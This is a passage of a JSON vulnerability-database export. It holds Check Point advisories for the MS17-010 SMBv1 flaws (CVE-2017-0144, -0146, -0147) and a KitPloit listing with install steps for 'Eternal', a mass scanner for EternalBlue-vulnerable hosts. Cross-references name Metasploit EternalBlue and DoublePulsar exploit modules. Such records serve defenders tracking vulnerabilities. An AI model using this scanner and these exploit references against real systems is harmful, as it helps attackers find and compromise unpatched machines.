"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "href": "", "reporter": "Check Point Advisories", "references": [], "cvelist": ["CVE-2017-0144"], "immutableFields": [], "lastseen": "2021-11-02T03:30:23", "history": [], "viewCount": 0, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2017-0144"]}, {"type": "kitploit", "idList": ["KITPLOIT:9146046356497464176"]}, {"type": "symantec", "idList": ["SMNTC-96704"]}, {"type": "attackerkb", "idList": ["AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1", "AKB:D476227F-C4B1-49E3-9947-897077E5150D"]}, {"type": "exploitdb", "idList": ["EDB-ID:41891", "EDB-ID:42031", "EDB-ID:41987", "EDB-ID:42030", "EDB-ID:47456"]}, {"type": "saint", "idList": ["SAINT:9EF85E0CE1D118D27911357B1C516074", "SAINT:64F70C2A6C3961CA44A77286E5B810CD"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:142181", "PACKETSTORM:142602", "PACKETSTORM:154690", 
"PACKETSTORM:142603", "PACKETSTORM:142548", "PACKETSTORM:156196"]}, {"type": "mscve", "idList": ["MS:CVE-2017-0144"]}, {"type": "zdt", "idList": ["1337DAY-ID-27802", "1337DAY-ID-27613", "1337DAY-ID-27786", "1337DAY-ID-27803", "1337DAY-ID-33895", "1337DAY-ID-33313", "1337DAY-ID-27752"]}, {"type": "threatpost", "idList": ["THREATPOST:6520102503D39BD2183F4ECDEFA9D591", "THREATPOST:C95C260596C8EA3C1F60B8BCC0360A41", "THREATPOST:302BC8714784E3B4BB7EC5CD2F81C1BA", "THREATPOST:B0EAC6CA3FDF5A249CE4DD7AC3DD46BD"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:90481B7D0C6FD15C950712E718E29E3A", "TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546", "TRENDMICROBLOG:F01C658432B4BB0C2F28F1E5CE666104"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:5BE2B1A9C552FAA033E4D4312076FD34"]}, {"type": "nessus", "idList": ["SMB_NT_MS17-010.NASL", "700059.PRM", "MS17-010.NASL", "SMB_DOUBLE_PULSAR_BACKDOOR_DETECT.NBIN", "700099.PRM"]}, {"type": "avleonov", "idList": ["AVLEONOV:98069D08913ADA26D85B10C827D3FE97", "AVLEONOV:C8B855FEC3E31BC28C624FF0B19272B7", "AVLEONOV:A5219F45CF78A7D911A6EBBE8F9D49B2"]}, {"type": "fireeye", "idList": ["FIREEYE:399092589F455855881447C60B56C21A", "FIREEYE:57B0F10A16E18DC672833B1812005B76"]}, {"type": "thn", "idList": ["THN:E18080D17705880B2E7B69B8AB125EA9", "THN:FF56343C15BACA1C1CE83A105EFD7F77", "THN:EA407B51944632C248FEB495594123EA"]}, {"type": "mmpc", "idList": ["MMPC:E537BA51663A720821A67D2A4F7F7F0E", "MMPC:F4F919BF0CF7F97FD15CFA500398C7D9", "MMPC:4A6B394DCAF12E05136AE087248E228C", "MMPC:F3E0CD42C341A30C758CB85AD9F6D052"]}, {"type": "securelist", "idList": ["SECURELIST:094B9FCE59977DD96C94BBF6A95D339E", "SECURELIST:CE501995262A06F4E132DE2F9C2B9B6C"]}, {"type": "rapid7blog", "idList": ["RAPID7BLOG:5721EC0F74BC2FA3F661282E284C798A"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:6652DB89D03D8AA145C2F888B5590E3F", "QUALYSBLOG:CD2337322AF45A03293696D535E4CBF8"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "f5", 
"idList": ["F5:K57181937"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810676", "OPENVAS:1361412562310810810"]}, {"type": "kaspersky", "idList": ["KLA10977", "KLA11902", "KLA10979"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8"]}, {"type": "seebug", "idList": ["SSV:92952"]}, {"type": "mskb", "idList": ["KB4013389"]}, {"type": "mssecure", "idList": ["MSSECURE:E537BA51663A720821A67D2A4F7F7F0E", "MSSECURE:4A6B394DCAF12E05136AE087248E228C"]}, {"type": "ics", "idList": ["ICSMA-18-058-02"]}], "modified": "2021-11-02T03:30:23", "rev": 2}, "score": {"value": 7.7, "vector": "NONE", "modified": "2021-11-02T03:30:23", "rev": 2}}, "objectVersion": "1.6", "severity": "Critical", "protected_by": ["Security Gateway R80", "Security Gateway R77", "Security Gateway R75"], "vulnerable_products": ["Windows Vista", "Windows Server 2008", "Windows 7", "Windows Server 2008 R2", "Windows 8.1", "Windows Server 2012", "Windows Server 2012 R2", "Windows RT 8.1", "Windows 10", "Windows Server 2016"], "_object_type": "robots.models.checkpoint.CheckpointAdvisoryBulletin", "_object_types": ["robots.models.checkpoint.CheckpointAdvisoryBulletin", "robots.models.base.Bulletin"]}, {"id": "CPAI-2017-0205", "vendorId": null, "hash": "2202ed3bdd16a2bb4c960200b3dc7ec8", "type": "checkpoint_advisories", "bulletinFamily": 
"info", "title": "Microsoft Windows SMB Information Disclosure (MS17-010: CVE-2017-0147)", "description": "An information disclosure vulnerability exists in the SMBv1 component of Microsoft Windows SMB server. The vulnerability is due to improper handling of SMBv1 requests. A remote, unauthenticated attacker could exploit this vulnerability by sending crafted SMBv1 messages to a target server. Successful exploitation could result in the disclosure of sensitive information from the target server.", "published": "2017-03-14T00:00:00", "modified": "2017-06-15T00:00:00", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:P/I:N/A:N"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "NONE", "baseScore": 4.3, "confidentialityImpact": "PARTIAL", "integrityImpact": "NONE", "vectorString": "AV:N/AC:M/Au:N/C:P/I:N/A:N", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "MEDIUM", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 5.9, "baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 3.6}, "href": "", "reporter": "Check Point Advisories", "references": [], "cvelist": ["CVE-2017-0147"], "immutableFields": [], "lastseen": "2021-11-02T03:30:30", "history": [], "viewCount": 0, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2017-0147"]}, {"type": "attackerkb", "idList": ["AKB:400EDB06-73BF-4A6D-A113-643077965C7B"]}, {"type": "symantec", "idList": ["SMNTC-96709"]}, {"type": "mscve", "idList": ["MS:CVE-2017-0147"]}, 
{"type": "securelist", "idList": ["SECURELIST:9E27BB3C9444305AA7FFD267587363A1"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810810", "OPENVAS:1361412562310810698", "OPENVAS:1361412562310810676"]}, {"type": "exploitdb", "idList": ["EDB-ID:41891", "EDB-ID:41987", "EDB-ID:43970", "EDB-ID:47456"]}, {"type": "threatpost", "idList": ["THREATPOST:758CC5987A361EA1BB8BBFFC425334D5"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:146236", "PACKETSTORM:156196", "PACKETSTORM:154690", "PACKETSTORM:142548", "PACKETSTORM:142181"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_PSEXEC", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:AUXILIARY/ADMIN/SMB/MS17_010_COMMAND", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE"]}, {"type": "zdt", "idList": ["1337DAY-ID-33895", "1337DAY-ID-27786", "1337DAY-ID-27752", "1337DAY-ID-33313", "1337DAY-ID-29702", "1337DAY-ID-27613"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:B891CB6093D217510DB7327088AE7FB2"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:F01C658432B4BB0C2F28F1E5CE666104", "TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607"]}, {"type": "nessus", "idList": ["700059.PRM", "SMB_NT_MS17-010.NASL", "700099.PRM", "MS17-010.NASL"]}, {"type": "kaspersky", "idList": ["KLA10979", "KLA11902", "KLA10977"]}, {"type": "seebug", "idList": ["SSV:92952"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": 
"mskb", "idList": ["KB4013389"]}, {"type": "ics", "idList": ["ICSMA-18-058-02"]}], "modified": "2021-11-02T03:30:30", "rev": 2}, "score": {"value": 5.3, "vector": "NONE", "modified": "2021-11-02T03:30:30", "rev": 2}}, "objectVersion": "1.6", "severity": "Medium", "protected_by": ["Security Gateway R80", "Security Gateway R77", "Security Gateway R75"], "vulnerable_products": ["Windows Vista", "Windows Server 2008", "Windows 7", "Windows Server 2008 R2", "Windows 8.1", "Windows Server 2012", "Windows Server 2012 R2", "Windows RT 8.1", "Windows 10", "Windows Server 2016"], "_object_type": "robots.models.checkpoint.CheckpointAdvisoryBulletin", "_object_types": ["robots.models.checkpoint.CheckpointAdvisoryBulletin", "robots.models.base.Bulletin"]}, {"id": "CPAI-2017-0203", "vendorId": null, "hash": "19557754abfd7f12e5743a129a4476d5", "type": "checkpoint_advisories", "bulletinFamily": "info", "title": "Microsoft Windows SMB Remote Code Execution (MS17-010: CVE-2017-0146)", "description": "A remote code execution vulnerability exists in Microsoft Server Message Block 1.0 (SMBv1). The vulnerability is due to the way the SMBv1 service handles certain requests. 
An attacker who successfully exploited the vulnerability could gain code execution on the target server.", "published": "2017-03-14T00:00:00", "modified": "2017-03-14T00:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "href": "", "reporter": "Check Point Advisories", "references": [], "cvelist": ["CVE-2017-0146"], "immutableFields": [], "lastseen": "2021-11-02T03:31:46", "history": [], "viewCount": 0, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2017-0146"]}, {"type": "metasploit", "idList": ["MSF:AUXILIARY/ADMIN/SMB/MS17_010_COMMAND", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_PSEXEC", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:ILITIES/MSFT-CVE-2017-0146/", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010"]}, {"type": "seebug", "idList": ["SSV:92952", "SSV:92964"]}, {"type": "symantec", "idList": ["SMNTC-96707"]}, {"type": "saint", "idList": ["SAINT:8F97D6443E5FED252FF64CE37A74709D", 
"SAINT:2D677AA07C3BC24D8037E937830ACA0D"]}, {"type": "mscve", "idList": ["MS:CVE-2017-0146"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810698", "OPENVAS:1361412562310810810", "OPENVAS:1361412562310810676"]}, {"type": "canvas", "idList": ["MS17_010"]}, {"type": "exploitdb", "idList": ["EDB-ID:41987", "EDB-ID:47456", "EDB-ID:43970", "EDB-ID:41891"]}, {"type": "threatpost", "idList": ["THREATPOST:758CC5987A361EA1BB8BBFFC425334D5"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:142181", "PACKETSTORM:154690", "PACKETSTORM:156196", "PACKETSTORM:146236", "PACKETSTORM:142548"]}, {"type": "zdt", "idList": ["1337DAY-ID-33895", "1337DAY-ID-27613", "1337DAY-ID-29702", "1337DAY-ID-27752", "1337DAY-ID-33313", "1337DAY-ID-27786"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:B891CB6093D217510DB7327088AE7FB2"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:F01C658432B4BB0C2F28F1E5CE666104", "TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546", "TRENDMICROBLOG:7E6831E46F8BB1882B752045F527ABE6"]}, {"type": "attackerkb", "idList": ["AKB:D476227F-C4B1-49E3-9947-897077E5150D", "AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "mskb", "idList": ["KB4013389"]}, {"type": "nessus", "idList": ["700059.PRM", "SMB_NT_MS17-010.NASL", "700099.PRM", "MS17-010.NASL"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820"]}, {"type": "kaspersky", "idList": ["KLA11902", "KLA10979", "KLA10977"]}, {"type": "ics", "idList": ["ICSMA-18-058-02"]}], "modified": 
"2021-11-02T03:31:46", "rev": 2}, "score": {"value": 8.8, "vector": "NONE", "modified": "2021-11-02T03:31:46", "rev": 2}}, "objectVersion": "1.6", "severity": "Critical", "protected_by": ["Security Gateway R80", "Security Gateway R77", "Security Gateway R75"], "vulnerable_products": ["Windows Vista", "Windows Server 2008", "Windows 7", "Windows Server 2008 R2", "Windows 8.1", "Windows Server 2012 and Windows Server 2012 R2", "Windows RT 8.1", "Windows 10", "Windows Server 2016", "Server Core installation option"], "_object_type": "robots.models.checkpoint.CheckpointAdvisoryBulletin", "_object_types": ["robots.models.checkpoint.CheckpointAdvisoryBulletin", "robots.models.base.Bulletin"]}], "kitploit": [{"id": "KITPLOIT:9146046356497464176", "bulletinFamily": "tools", "title": "Eternal - An internet scanner for Eternal Blue [exploit CVE-2017-0144]", "description": "[ ![](https://2.bp.blogspot.com/-ebEXboez-GA/WXJ7VQgyY6I/AAAAAAAAITI/FCM3YSqqjLcm87TdjLvynjO7ZPi69yyHQCLcBGAs/s1600/eternal_scanner_01.png) ](<https://2.bp.blogspot.com/-ebEXboez-GA/WXJ7VQgyY6I/AAAAAAAAITI/FCM3YSqqjLcm87TdjLvynjO7ZPi69yyHQCLcBGAs/s1600/eternal_scanner_01.png>)\n\n \nEternal scanner is a network scanner for Eternal Blue exploit CVE-2017-0144. 
\n \n** Requirements ** \n\n\n * masscan \n * metasploit-framework \n \n** How to Install ** \n\n\n * git clone [ https://github.com/peterpt/eternal_scanner.git ](<https://github.com/peterpt/eternal_scanner.git>)\n * cd eternal_scanner &amp;&amp; ./escan \n * OR ./escan -h (to change scanner speed) \n \n** Install Requirements ** \n\n\n * apt-get install masscan metasploit-framework \n \n** Screenshots ** \n \n\n\n[ ![](https://2.bp.blogspot.com/-4ZNlV-7ckHs/WXJ7bweYVMI/AAAAAAAAITM/m1JxWOzp-38O2kbC8CarDwDMvuNnmlPQwCLcBGAs/s640/eternal_scanner_02.png) ](<https://2.bp.blogspot.com/-4ZNlV-7ckHs/WXJ7bweYVMI/AAAAAAAAITM/m1JxWOzp-38O2kbC8CarDwDMvuNnmlPQwCLcBGAs/s1600/eternal_scanner_02.png>)\n\n \n\n\n[ ![](https://3.bp.blogspot.com/-TimKnQRCUXo/WXJ7bwGRiAI/AAAAAAAAITQ/2uV5P4byYYkAnQSJNe-DWjNhkj9LnIg8ACLcBGAs/s640/eternal_scanner_03.png) ](<https://3.bp.blogspot.com/-TimKnQRCUXo/WXJ7bwGRiAI/AAAAAAAAITQ/2uV5P4byYYkAnQSJNe-DWjNhkj9LnIg8ACLcBGAs/s1600/eternal_scanner_03.png>)\n\n \n\n\n[ ![](https://4.bp.blogspot.com/-qZ6IfE1iMQ8/WXJ7b7y74FI/AAAAAAAAITU/NMvDIFUu0ToXP6_lDqwMNfrzXwVkqG7SgCLcBGAs/s640/eternal_scanner_04.png) ](<https://4.bp.blogspot.com/-qZ6IfE1iMQ8/WXJ7b7y74FI/AAAAAAAAITU/NMvDIFUu0ToXP6_lDqwMNfrzXwVkqG7SgCLcBGAs/s1600/eternal_scanner_04.png>)\n\n \n\n\n[ ![](https://1.bp.blogspot.com/-prlZCQt8VmM/WXJ7cHR8hBI/AAAAAAAAITY/lYJZHQC3-UYghdHL9UaYTDk2EwVTK-9rwCLcBGAs/s640/eternal_scanner_05.png) ](<https://1.bp.blogspot.com/-prlZCQt8VmM/WXJ7cHR8hBI/AAAAAAAAITY/lYJZHQC3-UYghdHL9UaYTDk2EwVTK-9rwCLcBGAs/s1600/eternal_scanner_05.png>)\n\n \n \n** [ Download Eternal ](<https://github.com/peterpt/eternal_scanner>) **\n", "published": "2017-07-22T20:30:34", "modified": "2017-07-22T20:30:34", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "href": "http://www.kitploit.com/2017/07/eternal-internet-scanner-for-eternal.html", "reporter": "KitPloit", "references": ["https://github.com/peterpt/eternal_scanner.git", "https://github.com/peterpt/eternal_scanner"], 
"cvelist": ["CVE-2017-0144"], "type": "kitploit", "lastseen": "2021-07-28T14:35:34", "history": [{"bulletin": {"bulletinFamily": "tools", "cvelist": ["CVE-2017-0144"], "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {}, "cvss3": {}, "description": "[ ![](https://2.bp.blogspot.com/-ebEXboez-GA/WXJ7VQgyY6I/AAAAAAAAITI/FCM3YSqqjLcm87TdjLvynjO7ZPi69yyHQCLcBGAs/s1600/eternal_scanner_01.png) ](<https://2.bp.blogspot.com/-ebEXboez-GA/WXJ7VQgyY6I/AAAAAAAAITI/FCM3YSqqjLcm87TdjLvynjO7ZPi69yyHQCLcBGAs/s1600/eternal_scanner_01.png>)\n\n \nEternal scanner is a network scanner for Eternal Blue exploit CVE-2017-0144. \n \n** Requirements ** \n\n\n * masscan \n * metasploit-framework \n \n** How to Install ** \n\n\n * git clone [ https://github.com/peterpt/eternal_scanner.git ](<https://github.com/peterpt/eternal_scanner.git>)\n * cd eternal_scanner &amp;&amp; ./escan \n * OR ./escan -h (to change scanner speed) \n \n** Install Requirements ** \n\n\n * apt-get install masscan metasploit-framework \n \n** Screenshots ** \n \n\n\n[ ![](https://2.bp.blogspot.com/-4ZNlV-7ckHs/WXJ7bweYVMI/AAAAAAAAITM/m1JxWOzp-38O2kbC8CarDwDMvuNnmlPQwCLcBGAs/s640/eternal_scanner_02.png) ](<https://2.bp.blogspot.com/-4ZNlV-7ckHs/WXJ7bweYVMI/AAAAAAAAITM/m1JxWOzp-38O2kbC8CarDwDMvuNnmlPQwCLcBGAs/s1600/eternal_scanner_02.png>)\n\n \n\n\n[ ![](https://3.bp.blogspot.com/-TimKnQRCUXo/WXJ7bwGRiAI/AAAAAAAAITQ/2uV5P4byYYkAnQSJNe-DWjNhkj9LnIg8ACLcBGAs/s640/eternal_scanner_03.png) ](<https://3.bp.blogspot.com/-TimKnQRCUXo/WXJ7bwGRiAI/AAAAAAAAITQ/2uV5P4byYYkAnQSJNe-DWjNhkj9LnIg8ACLcBGAs/s1600/eternal_scanner_03.png>)\n\n \n\n\n[ ![](https://4.bp.blogspot.com/-qZ6IfE1iMQ8/WXJ7b7y74FI/AAAAAAAAITU/NMvDIFUu0ToXP6_lDqwMNfrzXwVkqG7SgCLcBGAs/s640/eternal_scanner_04.png) ](<https://4.bp.blogspot.com/-qZ6IfE1iMQ8/WXJ7b7y74FI/AAAAAAAAITU/NMvDIFUu0ToXP6_lDqwMNfrzXwVkqG7SgCLcBGAs/s1600/eternal_scanner_04.png>)\n\n \n\n\n[ 
![](https://1.bp.blogspot.com/-prlZCQt8VmM/WXJ7cHR8hBI/AAAAAAAAITY/lYJZHQC3-UYghdHL9UaYTDk2EwVTK-9rwCLcBGAs/s640/eternal_scanner_05.png) ](<https://1.bp.blogspot.com/-prlZCQt8VmM/WXJ7cHR8hBI/AAAAAAAAITY/lYJZHQC3-UYghdHL9UaYTDk2EwVTK-9rwCLcBGAs/s1600/eternal_scanner_05.png>)\n\n \n \n** [ Download Eternal ](<https://github.com/peterpt/eternal_scanner>) **\n", "edition": 24, "enchantments": {"dependencies": {"modified": "2020-12-08T15:25:54", "references": [{"idList": ["MMPC:F4F919BF0CF7F97FD15CFA500398C7D9", "MMPC:F3E0CD42C341A30C758CB85AD9F6D052", "MMPC:E537BA51663A720821A67D2A4F7F7F0E"], "type": "mmpc"}, {"idList": ["ICSMA-18-058-02"], "type": "ics"}, {"idList": ["RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607"], "type": "rapid7community"}, {"idList": ["SECURELIST:CE501995262A06F4E132DE2F9C2B9B6C", "SECURELIST:094B9FCE59977DD96C94BBF6A95D339E"], "type": "securelist"}, {"idList": ["TRENDMICROBLOG:F01C658432B4BB0C2F28F1E5CE666104", "TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546", "TRENDMICROBLOG:90481B7D0C6FD15C950712E718E29E3A"], "type": "trendmicroblog"}, {"idList": ["THREATPOST:302BC8714784E3B4BB7EC5CD2F81C1BA", "THREATPOST:C95C260596C8EA3C1F60B8BCC0360A41", "THREATPOST:6520102503D39BD2183F4ECDEFA9D591", "THREATPOST:B0EAC6CA3FDF5A249CE4DD7AC3DD46BD"], "type": "threatpost"}, {"idList": ["OPENVAS:1361412562310810676", "OPENVAS:1361412562310810810"], "type": "openvas"}, {"idList": ["KB4013389"], "type": "mskb"}, {"idList": ["AVLEONOV:A5219F45CF78A7D911A6EBBE8F9D49B2", "AVLEONOV:C8B855FEC3E31BC28C624FF0B19272B7", "AVLEONOV:98069D08913ADA26D85B10C827D3FE97"], "type": "avleonov"}, {"idList": 
["1337DAY-ID-27802", "1337DAY-ID-27786", "1337DAY-ID-27752", "1337DAY-ID-27803", "1337DAY-ID-33313", "1337DAY-ID-33895", "1337DAY-ID-27613"], "type": "zdt"}, {"idList": ["AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1", "AKB:D476227F-C4B1-49E3-9947-897077E5150D"], "type": "attackerkb"}, {"idList": ["EDB-ID:41987", "EDB-ID:47456", "EDB-ID:42030", "EDB-ID:41891", "EDB-ID:42031"], "type": "exploitdb"}, {"idList": ["SMNTC-96704"], "type": "symantec"}, {"idList": ["MALWAREBYTES:5BE2B1A9C552FAA033E4D4312076FD34"], "type": "malwarebytes"}, {"idList": ["MSSECURE:E537BA51663A720821A67D2A4F7F7F0E"], "type": "mssecure"}, {"idList": ["MS:CVE-2017-0144"], "type": "mscve"}, {"idList": ["RAPID7BLOG:5721EC0F74BC2FA3F661282E284C798A"], "type": "rapid7blog"}, {"idList": ["KLA11902", "KLA10977", "KLA10979"], "type": "kaspersky"}, {"idList": ["THN:EA407B51944632C248FEB495594123EA", "THN:FF56343C15BACA1C1CE83A105EFD7F77", "THN:E18080D17705880B2E7B69B8AB125EA9"], "type": "thn"}, {"idList": ["SAINT:64F70C2A6C3961CA44A77286E5B810CD", "SAINT:9EF85E0CE1D118D27911357B1C516074"], "type": "saint"}, {"idList": ["FIREEYE:399092589F455855881447C60B56C21A"], "type": "fireeye"}, {"idList": ["CVE-2017-0144"], "type": "cve"}, {"idList": ["SSV:92952"], "type": "seebug"}, {"idList": ["PACKETSTORM:154690", "PACKETSTORM:142181", "PACKETSTORM:142602", "PACKETSTORM:142548", "PACKETSTORM:142603", "PACKETSTORM:156196"], "type": "packetstorm"}, {"idList": ["F5:K57181937"], "type": "f5"}, {"idList": ["MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE"], "type": "metasploit"}, {"idList": ["MS17-010.NASL", "SMB_NT_MS17-010.NASL"], "type": "nessus"}, {"idList": ["HUAWEI-SA-20170513-01-WINDOWS"], "type": "huawei"}], "rev": 2}, "score": {"modified": "2020-12-08T15:25:54", "rev": 2, "value": 7.8, "vector": "NONE"}}, "hash": 
"2a141aa34d5f3ac1510bbde312bd8529904dc85a8b9ab3b9f1a6e993be1d6bce", "hashmap": [{"hash": "95d55efa8ae602b327bf293a3381d168", "key": "references"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "immutableFields"}, {"hash": "97d03efd613b8501d42c93b1d42747ec", "key": "toolHref"}, {"hash": "c57d2ee468d93289dff158782f8ce588", "key": "published"}, {"hash": "c57d2ee468d93289dff158782f8ce588", "key": "modified"}, {"hash": "1b52e5b85d1d34348a9126f4ca83d047", "key": "href"}, {"hash": "aba454e3574969396c0dddcb45011dcc", "key": "reporter"}, {"hash": "d726e774add6189e33cf2ea0c61a2ba5", "key": "cvss"}, {"hash": "4a931512ce65bdc9ca6808adf92d8783", "key": "bulletinFamily"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvss3"}, {"hash": "41bcfd3a3826e72c80143f1a952e3cdf", "key": "title"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvss2"}, {"hash": "4553be2119d862322dd6fec6bb385401", "key": "type"}, {"hash": "013b6203cead14382a8f19ad32d99966", "key": "cvelist"}, {"hash": "9df98113b3627a03ccb38f7f88ba42eb", "key": "description"}], "history": [], "href": "http://www.kitploit.com/2017/07/eternal-internet-scanner-for-eternal.html", "id": "KITPLOIT:9146046356497464176", "immutableFields": [], "lastseen": 